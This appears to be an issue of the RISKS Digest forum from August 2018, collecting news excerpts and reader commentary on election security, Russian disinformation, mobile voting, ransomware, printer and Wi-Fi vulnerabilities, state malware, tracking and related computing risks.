Please try the URL privacy information feature enabled by clicking the flashlight icon above. This will reveal two icons after each link the body of the digest. The shield takes you to a breakdown of Terms of Service for the site - however only a small number of sites are covered at the moment. The flashlight take you to an analysis of the various trackers etc. that the linked site delivers. Please let the website maintainer know if you find this useful or not. As a RISKS reader, you will probably not be surprised by what is revealed…
*As President Barack Obama* prepared to leave office, his administration had no doubt that Russia had mounted a devastating disinformation campaign and hacked our electoral systems—and would likely do it again. But President-elect Donald Trump was notably uninterested in the threat. When FBI Director James Comey and other leaders of the intelligence community visited Trump Tower in January 2017 to explain how the country had been attacked, Comey recalled in his memoir, Trump's team had “no questions about what the future Russian threat might be.'' Instead, Comey wrote, they launched “immediately into a strategy session¦about how they could spin what we'd just told them.'' The meeting set the tone for the administration. After four months as attorney general, Jeff Sessions told the Senate he had not once been briefed on Russian election interference, even though his department oversees the FBI, which investigates Russia's disinformation campaigns and hacks like the one in Illinois. When John Bolton took over as national security adviser in April, he promptly pushed out two top White House cybersecurity experts. In May, Homeland Security Secretary Kirstjen Nielsen, whose department also plays a leading role in election security, Told reporters she wasn't aware of US intelligence agencies having found that Russia aimed to help Trump; she made similar remarks at a July security conference. The White House has acknowledged just one Cabinet-level meeting on election security, and it didn't come until May. SOURCES: <http://www.dni.gov/files/documents/ICA_2017_01.pdf> <http://time.com/4817199/jeff-sessions-testimony-russia-investigation-briefing/ <http://www.c-span.org/video/%3Fc4742826/nielsen-question-russian-support-trump <http://www.huffingtonpost.com/entry/kirstjen-nielsen-homeland-security-trump-russia_us_5b50ad1ce4b0fd5c73c30dfa <http://www.whitehouse.gov/briefings-statements/readout-president-donald-j-trumps-meeting-regarding-election-security/> http://www.motherjones.com/politics/2018/07/the-midterm-elections-are-in-serious-danger-of-being-hacked-thanks-to-trump/
West Virginians serving overseas will be the first in the country to cast federal election ballots using a smartphone app, a move designed to make voting in November's election easier for troops living abroad. But election integrity and computer security experts expressed alarm at the prospect of voting by phone, and one went so far as to call it "a horrific idea." ... Ballots are anonymized, the company says, and recorded on a public digital ledger called blockchain. Although that technology is most often associated with Bitcoin and other cryptocurrencies, it can be used to record all manner of data. http://money.cnn.com/2018/08/06/technology/mobile-voting-west-virginia-voatz/index.html Oh, it's blockchain-based. OK, then. [See http://xkcd.com ... PGN]
http://www.mcclatchydc.com/news/politics-government/article216056560.html "670 ballots in a precinct with 276 voters, and other tales from Georgia's primary"
NNSquad http://cacm.acm.org/magazines/2018/8/229771-traceability/fulltext "This suggests to me that the notion of traceability under (internationally?) agreed circumstances (that is, differential traceability) might be a fruitful concept to explore. In most societies today, it is accepted that we must be identifiable to appropriate authorities under certain conditions (consider border crossings, traffic violation stops as examples). While there are conditions under which apparent anonymity is desirable and even justifiable (whistle-blowing, for example) absolute anonymity is actually quite difficult to achieve (another point made at the Ditchley workshop) and might not be absolutely desirable given the misbehaviors apparent anonymity invites. I expect this is a controversial conclusion and I look forward to subsequent discussion." Vint Cerf While I have frequently called for greater accountability in key aspects of Internet operations (in particular, public access to WHOIS domain data except in limited circumstances), I fear that in the general case Vint's Traceability proposal would mostly gladden the hearts of bad governmental players in countries such as China, Russia, and even here in the USA. It basically amounts to an escrowed identity system, a concept that has been widely and appropriately criticized in the encryption arena. Given that a significant degree of anonymity is crucial for human rights advocates and others who live in areas of the world that are routinely under government oppression, I do not see obvious ways that Vint's proposal could be implemented without innocent parties being even more at the mercy of oppressive governments than they are today.
Putin is afraid of one thing. Make him think it could happen.
Michael Morell, *The Washington Post*, 7 Aug 2018
http://www.washingtonpost.com/opinions/putin-is-afraid-of-one-thing-make-him-think-it-could-happen/2018/08/07/edbe08b4-998b-11e8-b60b-1c897f17e185_story.html%3Futm_term%3D.5dc2e012e179%26wpisrc%3Dnl_most%26wpmm%3D1
Facebook revealed on 31 Jul 2018 that it had discovered a 17-month-long
influence campaign sow political divisiveness on its network, an effort that
bore the hallmarks of the Kremlin-connected Internet Research Agency. Two
days later at the White House, the nation's top national security officials
said Russia is conducting a pervasive campaign to weaken our democracy and
influence this year's midterm elections. Taken together, these announcements
leave no doubt that Russian President Vladimir Putin's political assault on
the United States continues unabated.
The most important question the Trump administration and Congress should be
asking is: How can we make Putin stop? Finding the answer is essential
because what Washington has done so far—some improvements in defending
against these attacks, along with a mixture of targeted sanctions against
Russia, the indictment of Russian officials and organizations as well as the
expulsion of Russian intelligence officers from the United States—has not
worked.
Stopping Putin is vital, not just as a matter of protecting American
democracy from Russian interference but also because we must signal a
stronger deterrence to other adversaries, such as China, Iran and North
Korea. Potential aggressors must be shown they will pay a price if they
attack. With better resources than Russia for trying to undermine our
democracy, China, in particular, needs to know that the United States would
respond by imposing a heavy cost.
The U.S. answer to Russia, so far, has been ineffective because Washington
has targeted only the entities and individuals actually involved in the
Russian information operations. Since the 2016 election, the United States,
at various times, has imposed sanctions on at least 10 Russian organizations
some more than once, and at least 23 specific individuals the sanctions'
targeting has had little impact on the Russian economy overall, the
political effect on Putin has been minor.
Here is what the United States needs to do. In terms of self-defense, it
must secure the nation's elections system, especially the software that
holds data on registered voters. Every vote should be tallied on a backup
paper ballot that could be used to verify election results, if
necessary. New rules and better enforcement are needed to keep foreign money
out of U.S. elections. The federal government should work with individual
campaigns to fortify the security of the technology and networks they
use. Finally, better coordination across the government is needed to protect
U.S. elections, which would probably best be achieved by creating a Hybrid
Threats Center similar to the National Counterterrorism Center.
Intelligence officials outline threats to midterm elections
FBI Director Christopher Wray and Homeland Security Secretary Kirstjen
Nielsen on 2 Aug 2018 discussed the disinformation attempts on the 2018
elections. (Reuters)
There are several bills in Congress, all with support on both sides of the
aisle, that would institute most of these changes and pay for them, but the
legislation is frozen by the partisanship this issue stirs.
As for imposing costs on those who attack the United States: Fully implement
sanctions already on the books. That is still not happening. But then move
beyond targeted sanctions to broad-based sanctions that are designed to hurt
the Russian economy—just as the Obama administration's sanctions against
Iran were designed to do, as are the Trump administration's. Make it clear
to Putin that we would drop the sanctions when he stopped interfering in the
democratic institutions of the United States and its allies, some of which
are also under siege.
What would such sanctions look like? A Senate bill introduced on 2 Aug 2018,
again with sponsors from both parties, is a good start: Prohibit any
transaction related to Russian energy projects and bar the purchase of new
Russian sovereign debt. Washington should encourage its allies to join in
these efforts.
Putin is afraid of one thing. He is afraid that one day the Russian middle
class will finally rebel against his regime and rush into the streets
demanding change. It happened in Tunis, Cairo and other Middle Eastern and
North African cities between 2010 and 2012, and it happened most alarmingly,
from Putin's perspective, four years ago in Kiev when Ukrainians threw out a
government beholden to Moscow. Sanctions that bite at the heart of the
Russian economy—sanctions that increase the risk that Russia's middle
class will become restive—will get Putin's attention.
The leaders that the United States has chosen, and the security experts they
have appointed and confirmed, are aware of the threat. A failure to defend
the nation as well as possible, and failure to impose severe costs on those
attacking our democracy, would be seen by history as a major abdication of
responsibility. The statements from intelligence officials at the White
House last week were an excellent first step. More steps, and stronger ones,
are urgently needed.
Michael Morell, a career intelligence officer, served as the deputy
director of the Central Intelligence Agency from 2010 to 2013; during that
period, he served twice as acting CIA director. He is the host of the
Intelligence Matters podcast.
[Edited for RISKS. The original has a slew of subtended URLs. PGN]
FBI charges 3 Ukrainians with hacking U.S. chains, stealing customers' credit card data A group called FIN7 allegedly stole the numbers of an estimated 15 million cards in a long-running scheme. http://www.washingtonpost.com/world/national-security/fbi-charges-ukrainians-with-hacking-us-chains-stealing-customers-credit-card-data/2018/08/01/7b74badc-95bc-11e8-a679-b09212fb69c2_story.html
These days I have been reading "Creditworthy: A History of Consumer Surveillance and Financial Identity in America". It is an excellent study of how the credit bureau / data broker industry started in the United States of America. I was amused by the inclusion of the following news item, which could have been published yesterday: http://www.nytimes.com/1984/06/22/business/credit-file-password-is-stolen.html "Credit File Password Is Stolen", New York Times, June 22nd, 1984. A password that could permit access to the credit histories of 90 million people was stolen and posted on an electronic bulletin board, TRW Information Systems said yesterday. [...] TRW, the nation's largest credit reporting company, said its files had been breached by someone who stole a password from a Sears, Roebuck & Company store on the West Coast. The credit company said it changed the password immediately after being told of the breach by an informant two weeks ago. The password could have been illegally used for a month, at most, and probably a week, said Geri L. Schanz, a TRW spokesman. She said there was no indication that merchandise was illegally charged. A preliminary examination of the Sears account determined no unusual activity; a store is billed each time its password is used and billings have not been higher than normal. Miss Schanz added that the intruders would not have been able to change information on the computer files. But TRW is conducting an intensive investigation to find out who breached the system and how. Ernest L. Arms, a spokesman for Sears in Chicago, said his company was ''concerned'' about the TRW incident, but he would supply no further details. Computer experts yesterday said the breach again raises the issue of whether the nation's companies and consumers are adequately protected. Yes, it definitely raised the issue. José María (Chema) Mateos
http://cdn.avweb.com/media/newspics/325/p1ck69odbj45312341mkikeb1ecv6.jpeg
Forget that shiny new octocopter, a Bay-area startup wants to make your
Cessna 172 autonomous. XWing says
<http://medium.com/xwing/hello-from-xwing-b25451771a61> "plug and play"
software that can make most light aircraft fly autonomously. Details on how
it works have not been released but the technology will revolve around
"sensing, reasoning and control," according to aviation tech website
TransportUP
<http://transportup.com/headlines-breaking-news/vehicles-manufactures/automated-flight-startup-xwing-raises-4-million-in-funding/>
It will also work on helicopters and multicopters but its designer sees its
main benefit as making GA [General Aviation] accessible to the
masses. According to XWing founder Marc Piette the key is getting rid of
pilots.[*] “Getting a license and maintaining proficiency even on a single
[-engine] aircraft type is time consuming and challenging,'' he said in a
post on his website. “Removing the need for a pilot will have a significant
impact in opening up the aviation market.''
Piette says that by eliminating pilots more people will be attracted to
aircraft ownership and that will increase demand for small planes. The
higher volumes will reduce production costs and make GA aircraft more
affordable, Piette theorizes. “We see a bright future where people and
places are ever more connected, where small aircraft can finally take their
rightful place in the transportation landscape, and where autonomous flight
will have a profound impact on society as we know it,'' he wrote. Apparently
some investors are seeing that bright future as TransportUP is reporting
XWing has attracted $4 million in initial investment, including some from
Microsoft.
* [NOTE: The purpose of drones is to get rid of pilots and passengers.
But someone has to be around to take the `blame' when something goes
wrong... PGN]
http://www.nytimes.com/2018/08/05/world/americas/venezuela-drone-attack-nicolas-maduro.html A drone attack that failed to kill President Nicolas Maduro of Venezuela unfolded on live TV and in front of many witnesses: “It was like, bang, I had never heard a sound like that in my life.''
http://www.washingtonpost.com/technology/an-alaskan-borough-turns-to-typewriters-and-handwriting-after-its-computers-were-hacked/2018/08/01/7689dafa-ab56-4e03-9677-556fc970e3ea_story.html Sage advice to adopt for any organization seeking resilience against ransomware opportunism. Paper files stored in filing cabinets and cooked by typewriters are immune from ransomware or DNS tunneling ex- filtration, but not fire or black bag ops (breaking & entering + theft).
Two security vulnerabilities have been identified with certain HP Inkjet printers. A maliciously crafted file sent to an affected device can cause a stack or static buffer overflow, which could allow remote code execution. http://support.hp.com/us-en/document/c06097712
Germany's use of state-sponsored malware to fight crime is under fire from several sides. http://www.zdnet.com/article/german-police-hacking-hit-by-volley-of-complaints-can-state-trojan-law-survive/ Civil rights activists and politicians will in the coming days launch a volley of constitutional complaints against the German government over its use of state-sponsored malware in criminal investigations. The first is that the recent law does not respect the boundaries set by the Constitutional Court in a 2008 ruling, which said state-sponsored malware, Staatstrojaner, can only be used to monitor ongoing communications, and not to search people's computers. The second part of the GFF's argument is that “there is an indirect detrimental effect on IT security as a whole.'' Ulf Buermeyer, the organization's chairman, said: “To use one of these state-sponsored malwares, authorities usually need a security flaw in the system they want to target. These flaws can not only be exploited by German state actors, but also by foreign state actors, or by plain criminals. We argue that trojans are detrimental to our security in general. It creates a strong incentive for state actors in Germany not to disclose security flaws to vendors. We say this is a risk and the German legislature entirely neglected this risk.''
http://www.hollywoodreporter.com/heat-vision/christopher-robin-refused-china-release-winnie-pooh-crackdown-1131907 A source pins the blame on the country's crusade against images of the Winnie the Pooh character, which has become a symbol of the resistance with foes of the ruling Communist Party, namely Chinese leader Xi Jinping. China's censorship regime isn't just oppressive and evil, it's utterly insane.
The Washington Post, 3 Aug 2018 During their meeting in the peninsula's demilitarized zone in late April, South Korean President Moon Jae-in handed Kim a USB stick containing detailed plans for an inter-Korean rail network. The two Korean leaders agreed to work toward reconnecting their rail network, built under Imperial Japan at the turn of the 20th century, then severed during the Korean War in the 1950s. http://www.washingtonpost.com/world/asia_pacific/south-korea-longs-for-a-train-to-europe--but-us-sanctions-on-north-korea-block-the-way/2018/08/03/1760ef76-9007-11e8-9b0d-749fb254bc3d_story.html Moon better hope Kim doesn't read Risks.
http://www.theguardian.com/commentisfree/2018/aug/05/magical-thinking-about-machine-learning-will-not-bring-artificial-intelligence-any-closer
http://www.bloomberg.com/news/articles/2018-08-02/protecting-mark-zuckerberg-just-got-more-expensive-for-facebook
via NNSquad http://medium.com/s/story/your-company-needs-a-digital-ombudsman-pronto-9454c61c273b Who Needs this Role? Google famously convened an ethics board to ruminate over the possible dangers A.I. poses for the future. That's admirable from a Let's-Avoid-the-Robopocalypse perspective, but Google needs this position of digital ombudsman to focus on their users' concerns now. (A quick Google search reveals that I'm not the first to suggest it.) Facebook needs this position. So does Twitter. And Snapchat. And Amazon. But the need extends well beyond these obvious digital and social media companies. One of the best articles I've seen on this topic in ages. And before anyone points it out, yeah, I did notice that it links back to my earlier discussions (updated many times over the years) regarding Google and Ombudsmen, via a link to a Techdirt article that I've previously noted.
http://www.scientificamerican.com/article/to-fight-fake-news-seti-researchers-update-alien-detection-scale/ SETI has created a new calculator to assess ET's signal to Earth. The calculator uses enumerated input values, with a few range selection options, to characterize the signal structure. The ET-for-real-calculator can be found here: http://dh4gan.github.io/rioscale2/. A peer-reviewed article published in the International Journal of Astrobiology article discusses the Rio2.0 scale, a method to characterize ET's signal as calculator input. I think the risk here, common to all software stacks, is whether or not it has been sufficiently qualified, especially for edge/threshold- trigger conditions that might accrue into an accidental public alarm. Hopefully, they'll be a few conscientious reviewers to evaluate the signal and calculator output before an emergency broadcast commences. Wonder if an adaptation can be automatically applied to various public information sources (e.g., social media platforms) to quickly identify bot publications w/o compromising free speech? The EditorBot might live someday.
A ransomware attack infected the town's computers and email system, forcing officials to pull them offline. http://www.washingtonpost.com/technology/2018/08/01/an-alaskan-borough-turns-typewriters-handwriting-after-its-computers-were-hacked/
A British Royal Air Force airwoman had her Tinder dating account hacked, leading to secrets about the country's new F-35 fighter jets being leaked, according to a Sunday report in the UK's Daily Mail <http://www.dailymail.co.uk/news/article-6027207/Honeytrap-spy-stole-secrets-new-RAF-stealth-jet-hacking-Tinder-profile.html> The RAF confirmed to the Mail that some information about the top secret planes was passed on to a third party after the woman's profile was hacked. The perpetrator used her account to strike up an online friendship with another member of the air force. http://www.timesofisrael.com/uk-f-35-secrets-said-leaked-after-tinder-account-hacked/
Charlie Osborne for Zero Day | August 8, 2018 The common Wi-Fi security standard is no longer as secure as you think. http://www.zdnet.com/article/new-wi-fi-attack-cracks-wpawpa2-passwords-with-ease/ A new way to compromise the WPA/WPA2 security protocols has been accidentally discovered by a researcher investigating the new WPA3 standard. The attack technique can be used to compromise WPA/WPA2-secured routers and crack Wi-Fi passwords which have Pairwise Master Key Identifiers (PMKID) features enabled.
Edward Craven Walker lived to see his greatest invention,the lava lamp <http://www.wired.com/2013/09/lava-lamp-50/ cultural comeback. But the British tinkerer (and famed nudist, incidentally) died before he could witness the 21st-century digital potential of his analog creation. Inside the San Francisco office of theweb security company Cloudflare <http://www.wired.com/tag/cloudflare/ groovy hardware help protect wide swaths of the Internet from infiltration. Here's how it works. Every time you log in to any website, you're assigned a unique identification number. It should be random, because if hackers can predict the number, they'll impersonate you. Computers, relying as they do on human-coded patterns, can't generate true randomness—but nobody can predict the goopy mesmeric swirlings of oil, water, and wax. Cloudflare films the lamps 24/7 and uses the ever-changing arrangement of pixels to help create a superpowered cryptographic key. “Anything that the camera captures gets incorporated into the randomness,'' says Nick Sullivan, the company's head of cryptography <http://www.wired.com/tag/cryptography/ includes visitors milling about and light streaming through the windows. (Any change in heat subtly affects the undulations of those glistening globules.) Sure,/theoretically/, bad guys could sneak their own camera into Cloudflare's lobby to capture the same scene, but the company's prepared for such trickery. It films the movements of a pendulum in its London office and records the measurements of a Geiger counter in Singapore to add more chaos to the equation. Crack that, Russians. http://www.wired.com/story/cloudflare-lava-lamps-protect-from-hackers/
Some tracking scripts may be harmless. But others are designed to recognize I.P. addresses and embed cookies that collect information prized by advertisers. http://www.nytimes.com/2018/08/02/education/learning/school-websites-information-tracking.html
Is it just me, or is anyone else in computer science annoyed by James Clapper's recent apology book tour, during which he blames everyone but the intelligence community for Hillary Clinton's 30,000 lost emails? Having been involved in the computer science field for half a century, with a personal email history almost as old, I can recall the heavy hand of the intelligence community in monopolizing encryption technology and criminalizing its export. The intelligence community's watchword: "NOBUS", meaning "NObody But U.S." (may use high-quality encryption and authentication). This heavy hand made it impossible to incorporate encryption and authentication into the fabric of everyday computer systems, and hence impossible for computers to *routinely* protect ordinary communications like emails. Only after Bernstein v. United States (1999) and Junger v. Daley (2000) was encryption finally permitted to become a fully integrated component of everyday computer systems. The computer science community thus lost *forty years* of experience and software development that would have led to email systems capable of storing Hillary's emails securely—even in her home closet. As the recent "Spectre" class of CPU vulnerabilities demonstrates, we are still living with legacy of this intelligence community "unwitting" (I prefer "witless") blunder. I would like to repeat to James Clapper what my grandmother used to say to me when I was a child: "when you point your (index) finger at someone, your other four fingers are pointing at yourself." I also have a better suggestion for the name of Clapper's book: "Redacts and Sneers: Half Truths from a Liar in Intelligence" rather than "Facts and Fears: Hard Truths from a Life in Intelligence" http://news.harvard.edu/gazette/story/2018/06/clapper-frets-over-past-damage-present-shortcomings-future-threats-to-us-intelligence/ Christina Pazzanese Harvard Staff Writer 22 Jun 2018 The worries over U.S. intelligence Former Director of National Intelligence James Clapper says he felt compelled to speak out about President Trump and the investigation into Russia's interference in the 2016 election.
When you know who someone is, have followed their patterns, and know who their friends are, you can get them to respond to phishing messages. At least, that was the theory when DFO lured an orca away from the harbour where he had taken up residence. (And now someone is going to take issue with "residence," since he was not from one of the resident pods, but was a transient.) http://vancouversun.com/news/local-news/orca-lured-from-comox-harbour-with-audio-playback-of-other-whales or http://is.gd/WHuq3X (And, yes, I know that orcas are delphinidae and therefore not true whales ...) (And, yes, I meant phishing, not fishing.) (false positive, identification, identity theft, impersonation, phishing, social engineering, social media) (Oh, you want even more links to security? Well, there is life safety, since transients feed on mammals, and that's what we are ...) (See also under "bears": http://catless.ncl.ac.uk/Risks/30/76%23subj21
It always amazes me not many countries follow the UK approach, where in normal circumstances the licence plate stays with the vehicle from manufacture to destruction. And I'm sure plenty of people will scream about the risks of ANPR (automatic number plate recognition) but it works well - mostly - for us where a computer in a police car scans neighbouring plates, then checks them against an online database for tax and insurance. Traders have a special plate which allows them to drive vehicles that are otherwise not registered, taxed or insured. This does, however, bring another risk into play. So many bills are paid monthly now, including insurance, so if you aren't alert it's far too easy - as happened to my daughter - for the insurance debit to bounce, the insurance company cancels the policy, the ANPR picks up your vehicle, and you get stopped for driving the vehicle without insurance. And the insurance company normally does NOT notify you that the payment bounced! In those circumstances, you are supposed either to re-insure your vehicle, at the roadside, by (smart)phone or the police will seize the vehicle. My daughter was lucky - the police let her proceed when she couldn't contact her insurers but many people have had their vehicle seized and it usually costs about £200 to get it back!
I'm sorry if I misinterpreted what Dimitri Maziuk said a few issues ago. Other followers of RISKS will need to review the entries and, as they see fit, apportion fault between the transmission & reception functions in our communication. Reply to bob@fenichel.net
Please report problems with the web pages to the maintainer